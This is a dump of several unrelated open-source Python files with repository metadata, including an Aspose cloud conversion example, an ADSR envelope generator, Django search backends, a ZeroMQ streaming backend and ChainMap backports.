"avg_score": 0.014720746195744022,
"num_lines": 119
} |
aas
asa
sas
import asposewordscloud
from asposewordscloud.WordsApi import WordsApi
from asposewordscloud.models import SaveOptionsData
import asposestoragecloud
from asposestoragecloud.StorageApi import StorageApi
from asposestoragecloud.StorageApi import ResponseMessage

apiKey = "XXXXX" #specify App Key
appSid = "XXXXX" #specify App SID
apiServer = "http://api.aspose.com/v1.1"
data_folder = "../../data/"

#Instantiate Aspose Storage API SDK
storageapiClient = asposestoragecloud.ApiClient.ApiClient(apiKey, appSid, debug = True)
storageApi = StorageApi(storageapiClient)

#Instantiate Aspose Words API SDK
apiClient = asposewordscloud.ApiClient.ApiClient(apiKey, appSid, debug = True)
wordsApi = WordsApi(apiClient)

#set input file name and target conversion format
name = "SampleWordDocument"
filename = name + ".docx"
format = "pdf"
storage="AsposeDropboxStorage"

#upload file to 3rd Party (like dropbox cloud storage)
storageApi.PutCreate(Path = filename, file = data_folder + filename, storage=storage)

#invoke Aspose.Words Cloud SDK API to convert words document to required format
response = wordsApi.GetDocumentWithFormat(name=filename, format=format, storage=storage)

# Stream the converted document to a local file on success.
if response.Status == 'OK':
    outfilename = "c:/temp/" + name + "." + format
    with open(outfilename, 'wb') as f:
        for chunk in response.InputStream:
            f.write(chunk)
| {
"repo_name": "asposewords/Aspose_Words_Cloud",
"path": "Examples/Python/Examples/ConvertDocumentAnyFormatThirdPartyStorage.py",
"copies": "2",
"size": "1362",
"license": "mit",
"hash": 471035402669402240,
"line_mean": 32.2195121951,
"line_max": 88,
"alpha_frac": 0.7635829662,
"autogenerated": false,
"ratio": 3.396508728179551,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.014403197644652525,
"num_lines": 41
} |
# Ask for the model year to search for (prompt is in Estonian).
aasta = int(input("Sisesta väljalaskeeaasta: "))
f = open("autod.csv", encoding="UTF-8")
# Skip (i.e. read past) the header row.
f.readline()
# Collect the per-model registration counts for that year into this dict.
mudelite_arvud = {}
for rida in f:
    jupid = rida.split(";")
    # Only process rows that match the requested year (column 4).
    if int(jupid[4]) == aasta:
        # "Model" here means the make + model-name combination.
        mudel = jupid[1] + " "+ jupid[2]
        arv = int(jupid[8])
        # First time we see this model: create a new entry...
        if not mudel in mudelite_arvud:
            mudelite_arvud[mudel] = arv
        # ...otherwise add to the existing count.
        else:
            mudelite_arvud[mudel] += arv
f.close()
# Now find the most popular model in the dict.
if len(mudelite_arvud) == 0:
    print("Ei leidu")
else:
    popim_mudel = ""
    popima_mudeli_arv = 0
    for mudel in mudelite_arvud:
        if mudelite_arvud[mudel] > popima_mudeli_arv:
            popim_mudel = mudel
            popima_mudeli_arv = mudelite_arvud[mudel]
    print(popim_mudel)
| {
"repo_name": "macobo/python-grader",
"path": "tasks/MTAT.03.100/2013/Midterm_1/KT2_N10_autod_solution.py",
"copies": "1",
"size": "1196",
"license": "mit",
"hash": 3819378580953038300,
"line_mean": 25.8409090909,
"line_max": 68,
"alpha_frac": 0.6316680779,
"autogenerated": false,
"ratio": 2.3667334669338675,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8343143608325931,
"avg_score": 0.031051587301587302,
"num_lines": 44
} |
__a__author__ = 'Ness'
from pylab import *
from numpy import *
''' ----Background
The envelope generators are incharge of the modulation of the sound amplitude in
4 main stages during the sound life cycle.
_____________________________________________ For a basic functional prototype, this module requires of
| Attack | 4 basic input values of time which define the duration of
|1 /\Decay | each stage PLUS the sustain level value(from 0 to 1)
|. / \ |
|. / \ |
|. / \ sustain |
|. / \_____________ |
|. / \ Realease |
|0 / \ |
|___________________________________________|
| | | | |
A D S R SustainLevel
'''
''' functions for the Iterative exponential method'''
''' Attack'''
def IterativeExp_AttackParameters(samples):
    """Return (coefficient, offset) for the one-pole attack recursion."""
    # Per-sample decay rate so the curve spans the attack range in `samples` steps.
    rate = (-math.log((1.0 + TCO_attack) / TCO_attack)) / samples
    attackCoefficient = exp(rate)
    attackOffset = (1.0 + TCO_attack) * (1.0 - attackCoefficient)
    return (attackCoefficient, attackOffset)
def IterativeExp_CreateAttackSignal(samples, coefficient, offset):
    """Generate the attack envelope via y[i] = offset + coefficient * y[i-1]."""
    signal = zeros(samples)
    previous = offset
    signal[0] = previous
    for index in range(1, samples):
        previous = offset + coefficient * previous
        signal[index] = previous
    return signal
''' Decay'''
def IterativeExp_DecayParameters(samples):
    """Return (coefficient, offset) for the one-pole decay recursion."""
    rate = (-math.log((1.0 + TCO_decay) / TCO_decay)) / samples
    decayCoefficient = exp(rate)
    # Offset aims the curve at the configured sustain level.
    decayOffset = (SustainLevel - TCO_decay) * (1.0 - decayCoefficient)
    return (decayCoefficient, decayOffset)
def IterativeExp_CreateDecaySignal(samples, coefficient, offset):
    """Decay envelope starting at 1.0: y[i] = offset + coefficient * y[i-1]."""
    signal = zeros(samples)
    signal[0] = 1.0
    for index in range(1, samples):
        signal[index] = offset + coefficient * signal[index - 1]
    return signal
''' Release'''
def IterativeExp_ReleaseParameters(samples):
    """Return (coefficient, offset) for the one-pole release recursion."""
    rate = (-math.log((1.0 + TCO_release) / TCO_release)) / samples
    releaseCoefficient = exp(rate)
    releaseOffset = TCO_release * (1.0 - releaseCoefficient)
    return (releaseCoefficient, releaseOffset)
def IterativeExp_CreateReleaseSignal(samples, coefficient, offset):
    """Release envelope starting at the module-level SustainLevel."""
    signal = zeros(samples)
    signal[0] = 1.0 * SustainLevel
    for index in range(1, samples):
        signal[index] = offset + coefficient * signal[index - 1]
    return signal
''' Utility functions'''
def timeToSamples(time, sampleRate=44100):
    """Convert a duration in seconds to a whole number of samples.

    Rounds to the nearest sample.  The previous implementation truncated
    int(time / (1.0 / sampleRate)), which loses a sample to floating-point
    error (e.g. 1.0 s at 100 Hz yielded 99 samples because
    1.0 / 0.01 == 99.999...).
    """
    return int(round(time * sampleRate))
'''Input values from User Interface'''
AttackTime=1.0     # Attack duration in seconds
DecayTime=0.20     # Decay duration in seconds
SustainTime=0.50   # Sustain duration in seconds; in practice, how long the key is held
ReleaseTime=0.20   # Release duration in seconds
SustainLevel=0.80  # Sustain amplitude, 0..1

''' Pre-defined values'''
Fs=100                  # Sample rate in Hertz
TCO_attack=exp(-1.5)    # goes from 0% to 77% in 1 time constant (tau normalized to 1)
TCO_decay=exp(-4.95)
TCO_release=exp(-4.95)  # goes down in 1 time constant
def main():
    """Build the four ADSR segments and plot each stage plus the full envelope."""
    # --- Attack curve (iterative exponential method) ---
    # number of samples for the attack curve
    attackSamples=timeToSamples(AttackTime,Fs)
    # coefficient and offset for the iterative model
    attackParameters=IterativeExp_AttackParameters(attackSamples)
    y_attack=IterativeExp_CreateAttackSignal(attackSamples,attackParameters[0],attackParameters[1])
    # --- Decay curve ---
    decaySamples=timeToSamples(DecayTime,Fs)
    decayParameters=IterativeExp_DecayParameters(decaySamples)
    y_decay=IterativeExp_CreateDecaySignal(decaySamples,decayParameters[0],decayParameters[1])
    # --- Sustain: constant level for the sustain duration ---
    sustainSamples=timeToSamples(SustainTime,Fs)
    y_sustain=ones(sustainSamples)*SustainLevel
    # --- Release curve ---
    releaseSamples=timeToSamples(ReleaseTime,Fs)
    releaseParameters=IterativeExp_ReleaseParameters(releaseSamples)
    y_release=IterativeExp_CreateReleaseSignal(releaseSamples,releaseParameters[0],releaseParameters[1])
    # Plot each stage in its own subplot, then the concatenated envelope.
    fig=figure(1)
    title('Construction of attack, decay,sustain and release phases')
    graph1=fig.add_subplot(511)
    axis1=arange(0,attackSamples,1)
    graph1.bar(axis1,y_attack,0.1, facecolor='purple')
    graph2=fig.add_subplot(512)
    axis2=arange(0,decaySamples,1)
    graph2.bar(axis2,y_decay,0.1, facecolor='blue')
    graph3=fig.add_subplot(513)
    axis3=arange(0,sustainSamples,1)
    graph3.bar(axis3,y_sustain,0.1, facecolor='black')
    graph4=fig.add_subplot(514)
    axis4=arange(0, releaseSamples,1)
    graph4.bar(axis4,y_release,0.1,facecolor='red')
    graph5=fig.add_subplot(515)
    y=concatenate((y_attack,y_decay,y_sustain,y_release))
    axis5=arange(0,size(y),1)
    graph5.bar(axis5,y,0.1,facecolor='green')
    show()

if __name__=="__main__":main()
| {
"repo_name": "nessBautista/AudioLab",
"path": "prototypes/SoundSynthesis/BasicEnvelopeGenerator.py",
"copies": "1",
"size": "5110",
"license": "cc0-1.0",
"hash": -6365594492089477000,
"line_mean": 31.9677419355,
"line_max": 122,
"alpha_frac": 0.6555772994,
"autogenerated": false,
"ratio": 3.4573748308525034,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9466734245700584,
"avg_score": 0.029243576910383814,
"num_lines": 155
} |
#aAvg,aMax,aMin,aP2P,aStd,gAvg,gMax,gMin,gP2P,gStd
# Hard-coded sample feature vector: accelerometer (a*) and gyroscope (g*)
# average / max / min / peak-to-peak / standard-deviation features.
ed = {}
ed['aAvg'] = 1.29104272266
ed['aMax'] = 10.3381593065
ed['aMin'] = 0.0566837541211
ed['aP2P'] = 10.2814755524
ed['aStd'] = 2.0007211641
ed['gAvg'] = 200.329659457
ed['gMax'] = 443.405006738
ed['gMin'] = 3.64189053916
ed['gP2P'] = 439.763116198
ed['gStd'] = 183.597262584

# Hand-translated decision tree: prints the predicted class label for the
# feature vector above.  Thresholds presumably come from an offline-trained
# classifier -- TODO confirm their provenance.
if(ed['aP2P'] <= 0.941):
    print("0")
else:
    if(ed['aAvg'] <= 1.2813):
        if(ed['gAvg'] <=95.5936):
            print("1")
        else:
            if(ed['aAvg'] <= 1.2155):
                if(ed['aStd'] <= 0.6642):
                    if(ed['aAvg'] <= 0.7339):
                        print("2")
                    else:
                        if(ed['aMin'] <= 0.1213):
                            print("1")
                        else:
                            print("2")
                else:
                    if(ed['gMax'] <= 367.7342):
                        print("1")
                    else:
                        print("2")
            else:
                print("1")
    else:
        if(ed['aMin'] <= 0.0565):
            if(ed['gAvg'] <= 257.9375):
                if(ed['gMin'] <= 3.6016):
                    print("2")
                else:
                    print("1")
            else:
                if(ed['gStd'] <= 133.4024):
                    print("2")
                else:
                    print("3")
        else:
            if(ed['aMin'] <= 0.1215):
                if(ed['gAvg'] <= 187.825):
                    print("2")
                else:
                    print("3")
            else:
print("3") | {
"repo_name": "cagdasyelen/fall-detection-engine",
"path": "src/DecisionTree.py",
"copies": "1",
"size": "1120",
"license": "apache-2.0",
"hash": -5140749373602360000,
"line_mean": 17.3770491803,
"line_max": 50,
"alpha_frac": 0.4982142857,
"autogenerated": false,
"ratio": 2.101313320825516,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.7857953299144309,
"avg_score": 0.048314861476241366,
"num_lines": 61
} |
"""A backend for the Elasticsearch search engine."""
from __future__ import unicode_literals
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext, ugettext_lazy as _
from reviewboard.search.search_backends.base import (SearchBackend,
SearchBackendForm)
class ElasticsearchConfigForm(SearchBackendForm):
    """A form for configuring the Elasticsearch search backend."""

    # URL of the Elasticsearch server to connect to.
    url = forms.URLField(
        label=_('Elasticsearch URL'),
        help_text=_('The URL of the Elasticsearch server.'),
        widget=forms.TextInput(attrs={'size': 80}))

    # Name of the Elasticsearch index to store documents under.
    index_name = forms.CharField(
        label=_('Elasticsearch index name'),
        help_text=_('The name of the Elasticsearch index.'),
        widget=forms.TextInput(attrs={'size': 40}))
class ElasticsearchBackend(SearchBackend):
    """A search backend for integrating with Elasticsearch"""

    search_backend_id = 'elasticsearch'
    name = _('Elasticsearch')
    # Haystack engine class used when this backend is selected.
    haystack_backend_name = ('haystack.backends.elasticsearch_backend.'
                             'ElasticsearchSearchEngine')
    default_settings = {
        'URL': 'http://127.0.0.1:9200/',
        'INDEX_NAME': 'reviewboard',
    }
    config_form_class = ElasticsearchConfigForm
    # Maps config form field names to Haystack connection setting keys.
    form_field_map = {
        'url': 'URL',
        'index_name': 'INDEX_NAME',
    }

    def validate(self):
        """Ensure that the elasticsearch Python module is installed.

        Raises:
            django.core.exceptions.ValidationError:
                Raised if the ``elasticsearch`` module is not installed.
        """
        try:
            import elasticsearch  # noqa
        except ImportError:
            raise ValidationError(ugettext(
                'The "elasticsearch" module is required to use the '
                'Elasticsearch search engine.'
            ))
| {
"repo_name": "davidt/reviewboard",
"path": "reviewboard/search/search_backends/elasticsearch.py",
"copies": "2",
"size": "1920",
"license": "mit",
"hash": 4563333462785929700,
"line_mean": 32.6842105263,
"line_max": 72,
"alpha_frac": 0.6260416667,
"autogenerated": false,
"ratio": 4.69437652811736,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00033101621979476995,
"num_lines": 57
} |
"""A backend for the Elasticsearch search engine."""
from __future__ import unicode_literals
from importlib import import_module
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext, ugettext_lazy as _
from reviewboard.search.search_backends.base import (SearchBackend,
SearchBackendForm)
class ElasticsearchConfigForm(SearchBackendForm):
    """A form for configuring the Elasticsearch search backend."""

    # URL of the Elasticsearch server to connect to.
    url = forms.URLField(
        label=_('Elasticsearch URL'),
        help_text=_('The URL of the Elasticsearch server.'),
        widget=forms.TextInput(attrs={'size': 80}))

    # Name of the Elasticsearch index to store documents under.
    index_name = forms.CharField(
        label=_('Elasticsearch index name'),
        help_text=_('The name of the Elasticsearch index.'),
        widget=forms.TextInput(attrs={'size': 40}))
class ElasticsearchBackend(SearchBackend):
    """A search backend for integrating with Elasticsearch"""

    search_backend_id = 'elasticsearch'
    name = _('Elasticsearch')
    # Haystack engine class used when this backend is selected.
    haystack_backend_name = ('haystack.backends.elasticsearch_backend.'
                             'ElasticsearchSearchEngine')
    default_settings = {
        'URL': 'http://127.0.0.1:9200/',
        'INDEX_NAME': 'reviewboard',
    }
    config_form_class = ElasticsearchConfigForm
    # Maps config form field names to Haystack connection setting keys.
    form_field_map = {
        'url': 'URL',
        'index_name': 'INDEX_NAME',
    }

    def validate(self):
        """Ensure a supported version of the elasticsearch module is installed.

        Raises:
            django.core.exceptions.ValidationError:
                Raised if the ``elasticsearch`` module is not installed,
                lacks version information, or is newer than 2.x.
        """
        try:
            module = import_module('elasticsearch')
        except ImportError:
            module = None

        # Check whether there's a supported version of the module available.
        # Note that technically, elasticsearch 1.x is supported, but it's
        # pretty old. If we're going to reference a version, we want to
        # reference 2.x.
        if (module is None or
            not hasattr(module, 'VERSION') or
            module.VERSION[0] > 2):
            raise ValidationError(ugettext(
                'The elasticsearch 2.x Python module (and the Elasticsearch '
                '2.x service) is required. The module can be installed by '
                'running: pip install "elasticsearch>=2.0,<3.0"'
            ))
| {
"repo_name": "reviewboard/reviewboard",
"path": "reviewboard/search/search_backends/elasticsearch.py",
"copies": "2",
"size": "2463",
"license": "mit",
"hash": 2759170254638927000,
"line_mean": 34.6956521739,
"line_max": 77,
"alpha_frac": 0.6224116931,
"autogenerated": false,
"ratio": 4.595149253731344,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6217560946831344,
"avg_score": null,
"num_lines": null
} |
"""A backend for the Whoosh search engine."""
from __future__ import unicode_literals
import os
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from reviewboard.search.search_backends.base import (SearchBackend,
SearchBackendForm)
class WhooshConfigForm(SearchBackendForm):
    """A form for configuring the Whoosh search backend."""

    # Absolute directory where Whoosh keeps its index files.
    search_index_file = forms.CharField(
        label=_("Search index directory"),
        help_text=_("The directory that search index data should be stored "
                    "in."),
        widget=forms.TextInput(attrs={'size': '80'}))

    def clean_search_index_file(self):
        """Clean the search_index_file field.

        This ensures the value is an absolute path and is writable.
        """
        index_file = self.cleaned_data['search_index_file'].strip()
        if index_file:
            if not os.path.isabs(index_file):
                raise ValidationError(
                    _("The search index path must be absolute."))
            # Only check writability if the path already exists; a missing
            # path will be created later.
            if (os.path.exists(index_file) and
                not os.access(index_file, os.W_OK)):
                raise ValidationError(
                    _('The search index path is not writable. Make sure the '
                      'web server has write access to it and its parent '
                      'directory.'))
        return index_file
class WhooshBackend(SearchBackend):
    """The Whoosh search backend."""

    search_backend_id = 'whoosh'
    name = _('Whoosh')
    # Haystack engine implementation backing this backend.
    haystack_backend_name = 'haystack.backends.whoosh_backend.WhooshEngine'
    config_form_class = WhooshConfigForm
    # Default index location lives under the site's data directory.
    default_settings = {
        'PATH': os.path.join(settings.SITE_DATA_DIR, 'search_index'),
    }
    # Maps config form field names to Haystack connection setting keys.
    form_field_map = {
        'search_index_file': 'PATH',
    }
| {
"repo_name": "davidt/reviewboard",
"path": "reviewboard/search/search_backends/whoosh.py",
"copies": "2",
"size": "1940",
"license": "mit",
"hash": -6161785956209922000,
"line_mean": 31.8813559322,
"line_max": 77,
"alpha_frac": 0.6087628866,
"autogenerated": false,
"ratio": 4.301552106430155,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 59
} |
"""A backend request handler process.
This file uses zmq.web to implement the backend logic for load balanced
Tornado request handlers.
This version uses a streaming message protocol to enable the backend to send
the HTTP body back to the frontend/browser in multiple asynchronous chunks.
To enable streaming mode, you have to use ZMQStreamingApplicationProxy in
the frontend and ZMQStreamingHTTPRequest in the backend.
To run this example:
* Start one instance of frontend_stream.py.
* Start one or more instances of backend_stream.py.
* Hit the URLs http://127.0.0.1:8888/foo and http://127.0.0.1:8888/foo/sleep?t=1.
The t parameter of this last URL can be changed to something greater than 10 to
observe the timeout behavior.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 Brian Granger, Min Ragan-Kelley
#
# Distributed under the terms of the New BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
import logging
logging.basicConfig(level=logging.DEBUG)
import time
from zmq.eventloop import ioloop
ioloop.install()
from tornado import web
from zmqweb import ZMQApplication, ZMQStreamingHTTPRequest
def flush_callback():
    """Log that a zmq buffer flush finished (used as a flush() callback)."""
    logging.info('Done flushing zmq buffers')
class FooHandler(web.RequestHandler):
    # Demonstrates streamed replies: each write()/flush() pair below is sent
    # to the frontend (and on to the browser) as its own chunk.
    @web.asynchronous
    def get(self):
        self.set_header('Handler', 'FooHandler')
        # Each write/flush pair is send back to the frontend/browser immediately.
        self.write('pow\n')
        self.flush(callback=flush_callback)
        # Number of 'bam' chunks still to stream before finishing the request.
        self.bam_count = 10
        def bam_and_finish():
            if self.bam_count>0:
                # Each write/flush pair is send back to the frontend/browser immediately.
                self.write('bam\n')
                self.flush(callback=flush_callback)
                self.bam_count -= 1
            else:
                # All chunks streamed: stop the periodic callback.
                self.bam_pc.stop()
                # Calling finish sends a final message to finish the request.
                self.finish()
        # Fire bam_and_finish once per 1000ms on the IOLoop.
        self.bam_pc = ioloop.PeriodicCallback(bam_and_finish, 1000, ioloop.IOLoop.instance())
        self.bam_pc.start()
class SleepHandler(web.RequestHandler):
    """Block for ``t`` seconds (query parameter, default 1.0), then reply."""

    def get(self):
        duration = float(self.get_argument('t', 1.0))
        time.sleep(duration)
        self.finish({'status': 'awake', 't': duration})
# Build the backend application that serves requests forwarded over zmq.
application = ZMQApplication(
    [
        # A single ZMQApplication can run multiple request handlers, but the
        # frontend must use a URL regular expression that matches all of the
        # patterns in the backend.
        (r"/foo", FooHandler),
        (r"/foo/sleep", SleepHandler)
    ],
    # To use streaming replies, we need to set http_request_class to
    # ZMQStreamingHTTPRequest. The frontend needs to use
    # ZMQStreamingApplicationProxy in this case.
    http_request_class=ZMQStreamingHTTPRequest
)
# Connect to the frontend on port 5555.
application.connect('tcp://127.0.0.1:5555')
# Hand control to the event loop; requests are served until interrupted.
ioloop.IOLoop.instance().start()
| {
"repo_name": "ellisonbg/zmqweb",
"path": "examples/backend_stream.py",
"copies": "1",
"size": "3064",
"license": "bsd-3-clause",
"hash": 7320632415571708000,
"line_mean": 34.6279069767,
"line_max": 93,
"alpha_frac": 0.6543733681,
"autogenerated": false,
"ratio": 4.074468085106383,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5228841453206383,
"avg_score": null,
"num_lines": null
} |
"""A backport of ChainMap from Python 3 to Python 2.
See http://hg.python.org/cpython/file/default/Lib/collections/__init__.py#l756
for original source code. Everything here is lifted directly from there.
"""
from collections import MutableMapping
class ChainMap(MutableMapping):
    """A ChainMap groups multiple dicts (or other mappings) together
    to create a single, updatable view.

    The underlying mappings are stored in a list. That list is public and can
    be accessed or updated using the *maps* attribute. There is no other state.

    Lookups search the underlying mappings successively until a key is found.
    In contrast, writes, updates and deletions only operate on the first
    mapping.
    """
    def __init__(self, *maps):
        self.maps = list(maps) or [{}]          # always at least one map
    def __missing__(self, key):
        raise KeyError(key)
    def __getitem__(self, key):
        for mapping in self.maps:
            try:
                return mapping[key]
            except KeyError:
                pass
        # Defer to __missing__ so subclasses can customize lookup failure.
        return self.__missing__(key)
    def get(self, key, default=None):
        return self[key] if key in self else default
    def __len__(self):
        # The union collapses duplicate keys shadowed by earlier maps.
        return len(set().union(*self.maps))
    def __iter__(self):
        return iter(set().union(*self.maps))
    def __contains__(self, key):
        return any(key in m for m in self.maps)
    def __bool__(self):
        return any(self.maps)
    # forgoing backporting recursive_repr as well,
    # so a slight deviation by using the ChainMap.parents method
    def __repr__(self):
        return "{0.__class__.__name__}({1})".format(
            self, ', '.join(map(repr, self.parents)))
    @classmethod
    def fromkeys(cls, iterable, *args):
        "Create a ChainMap with a single dict created from the iterable"
        return cls(dict.fromkeys(iterable, *args))
    def copy(self):
        "New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]"
        return self.__class__(self.maps[0].copy(), *self.maps[1:])
    __copy__ = copy
    def new_child(self, m=None):
        '''New ChainMap with a new map followed by all previous maps. If no
        map is provided an empty dict is used.

        BUG FIX: this previously passed ``*self.maps[1:]``, silently dropping
        the current front mapping from the child; CPython's implementation
        passes all of ``self.maps``.
        '''
        if m is None:
            m = {}
        return self.__class__(m, *self.maps)
    @property
    def parents(self):
        "New ChainMap from maps[1:]"
        return self.__class__(*self.maps[1:])
    def __setitem__(self, key, value):
        self.maps[0][key] = value
    def __delitem__(self, key):
        try:
            del self.maps[0][key]
        except KeyError:
            raise KeyError('Key not found in the first mapping: {!r}'.format(key))
    def popitem(self):
        "Remove and return an item pair from maps[0]. Raise KeyError if maps[0] is empty"
        try:
            return self.maps[0].popitem()
        except KeyError:
            raise KeyError("No keys found in the first mapping.")
    def pop(self, key, *args):
        "Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0]"
        try:
            return self.maps[0].pop(key, *args)
        except KeyError:
            raise KeyError('Key not found in the first mapping: {!r}'.format(key))
    def clear(self):
        "Clear maps[0], leaving maps[1:] intact"
        self.maps[0].clear()
# Recipe taken from the Python3 collections module documentation
class DeepChainMap(ChainMap):
    "Variant of ChainMap that allows direct updates to inner scopes"

    def __setitem__(self, key, value):
        # Write through to the first layer already holding *key*; otherwise
        # fall back to inserting into the front map like a plain ChainMap.
        for layer in self.maps:
            if key in layer:
                layer[key] = value
                return
        self.maps[0][key] = value

    def __delitem__(self, key):
        # Remove *key* from the first layer that holds it.
        for layer in self.maps:
            if key in layer:
                del layer[key]
                return
        raise KeyError(key)
| {
"repo_name": "justanr/Py2ChainMap",
"path": "__init__.py",
"copies": "1",
"size": "3942",
"license": "mit",
"hash": 8991983741950350000,
"line_mean": 29.796875,
"line_max": 96,
"alpha_frac": 0.5915778792,
"autogenerated": false,
"ratio": 4.072314049586777,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.004910586805812932,
"num_lines": 128
} |
""" A backport of ChainMap from Python 3 to Python 2.
From https://github.com/justanr/Py2ChainMap
See http://hg.python.org/cpython/file/default/Lib/collections/__init__.py#l756
For original source code. Everything here is lifted directly from there.
"""
from collections import MutableMapping
class ChainMap(MutableMapping):
    """A ChainMap groups multiple dicts (or other mappings) together
    to create a single, updatable view.

    The underlying mappings are stored in a list. That list is public and can
    be accessed or updated using the *maps* attribute. There is no other state.

    Lookups search the underlying mappings successively until a key is found.
    In contrast, writes, updates and deletions only operate on the first
    mapping.
    """
    def __init__(self, *maps):
        self.maps = list(maps) or [{}]          # always at least one map
    def __missing__(self, key):
        raise KeyError(key)
    def __getitem__(self, key):
        for mapping in self.maps:
            try:
                return mapping[key]
            except KeyError:
                pass
        # Defer to __missing__ so subclasses can customize lookup failure.
        return self.__missing__(key)
    def get(self, key, default=None):
        return self[key] if key in self else default
    def __len__(self):
        # The union collapses duplicate keys shadowed by earlier maps.
        return len(set().union(*self.maps))
    def __iter__(self):
        return iter(set().union(*self.maps))
    def __contains__(self, key):
        return any(key in m for m in self.maps)
    def __bool__(self):
        return any(self.maps)
    # forgoing backporting recursive_repr as well,
    # so a slight deviation by using the ChainMap.parents method
    def __repr__(self):
        return "{0.__class__.__name__}({1})".format(
            self, ', '.join(map(repr, self.parents)))
    @classmethod
    def fromkeys(cls, iterable, *args):
        "Create a ChainMap with a single dict created from the iterable"
        return cls(dict.fromkeys(iterable, *args))
    def copy(self):
        "New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]"
        return self.__class__(self.maps[0].copy(), *self.maps[1:])
    __copy__ = copy
    def new_child(self, m=None):
        '''New ChainMap with a new map followed by all previous maps. If no
        map is provided an empty dict is used.

        BUG FIX: this previously passed ``*self.maps[1:]``, silently dropping
        the current front mapping from the child; CPython's implementation
        passes all of ``self.maps``.
        '''
        if m is None:
            m = {}
        return self.__class__(m, *self.maps)
    @property
    def parents(self):
        "New ChainMap from maps[1:]"
        return self.__class__(*self.maps[1:])
    def __setitem__(self, key, value):
        self.maps[0][key] = value
    def __delitem__(self, key):
        try:
            del self.maps[0][key]
        except KeyError:
            raise KeyError('Key not found in the first mapping: {!r}'.format(key))
    def popitem(self):
        "Remove and return an item pair from maps[0]. Raise KeyError if maps[0] is empty"
        try:
            return self.maps[0].popitem()
        except KeyError:
            raise KeyError("No keys found in the first mapping.")
    def pop(self, key, *args):
        "Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0]"
        try:
            return self.maps[0].pop(key, *args)
        except KeyError:
            raise KeyError('Key not found in the first mapping: {!r}'.format(key))
    def clear(self):
        "Clear maps[0], leaving maps[1:] intact"
        self.maps[0].clear()
# Recipe taken from the Python3 collections module documentation
class DeepChainMap(ChainMap):
    "Variant of ChainMap that allows direct updates to inner scopes"

    def __setitem__(self, key, value):
        # Update the first scope that already holds *key*, falling back to
        # the front mapping when none does.
        for scope in self.maps:
            if key in scope:
                scope[key] = value
                return
        self.maps[0][key] = value

    def __delitem__(self, key):
        # Delete from the first scope holding *key*; KeyError otherwise.
        for scope in self.maps:
            if key in scope:
                del scope[key]
                return
        raise KeyError(key)
| {
"repo_name": "jonathaneunice/Py2ChainMap",
"path": "py2chainmap.py",
"copies": "2",
"size": "3988",
"license": "bsd-3-clause",
"hash": -723510244105619000,
"line_mean": 30.15625,
"line_max": 96,
"alpha_frac": 0.593781344,
"autogenerated": false,
"ratio": 4.048730964467005,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5642512308467005,
"avg_score": null,
"num_lines": null
} |
"""abacus_edu URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include, patterns
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from rest_framework_jwt.views import obtain_jwt_token
from .views.push_notification import push_notification
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    # Versioned REST API routes.
    url(r'^api/v1/', include('api.v1.urls', namespace='api')),
    # Push Notification Through FCM
    url(r'^push/', push_notification, name="push-notification"),
    # Obtain JWT Token
    url(r'^api-token-auth/', obtain_jwt_token),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
    # Debug toolbar routes are only mounted when DEBUG is on.
    import debug_toolbar
    urlpatterns += [
        url(r'^__debug__/', include(debug_toolbar.urls)),
    ]
| {
"repo_name": "jupiny/abacus-edu",
"path": "abacus_edu/abacus_edu/urls.py",
"copies": "1",
"size": "1404",
"license": "mit",
"hash": -4098792528479811000,
"line_mean": 33.243902439,
"line_max": 79,
"alpha_frac": 0.7015669516,
"autogenerated": false,
"ratio": 3.518796992481203,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4720363944081203,
"avg_score": null,
"num_lines": null
} |
# A Banking account for the Bank X
# Some algorithms were created just to demonstrate basic methods
# Sample customer birthdays keyed by first name.
# NOTE(review): 'Andrey' uses slashes ('09/05/1990') while the others use
# dots -- looks like inconsistent sample data; confirm the intended format.
Birthday_data = {'David': '03.03.1994', 'George': '12.01.1991', 'Andrey': '09/05/1990'}
# Social Security Numbers keyed by holder name.
SSN = {'David': '23423443', 'George': '343423423', 'Andrey': '34333432'}
# Account type per holder ('Checking' or 'Saving').
Account_Type = {'David': 'Checking', 'George': 'Saving', 'Andrey': 'Checking'}
# Holders that failed a database lookup are recorded here (see Database_information).
ERROR = {}
class Account:
    """Banking Account for the Bank X.

    Holds a balance for ``account_holder`` and validates the card number
    (Luhn checksum) and PIN (derived from the card digits by the bank's
    encoding) before allowing deposits and withdrawals.
    """

    # Bank-wide interest rate. NOTE(review): not referenced by any method
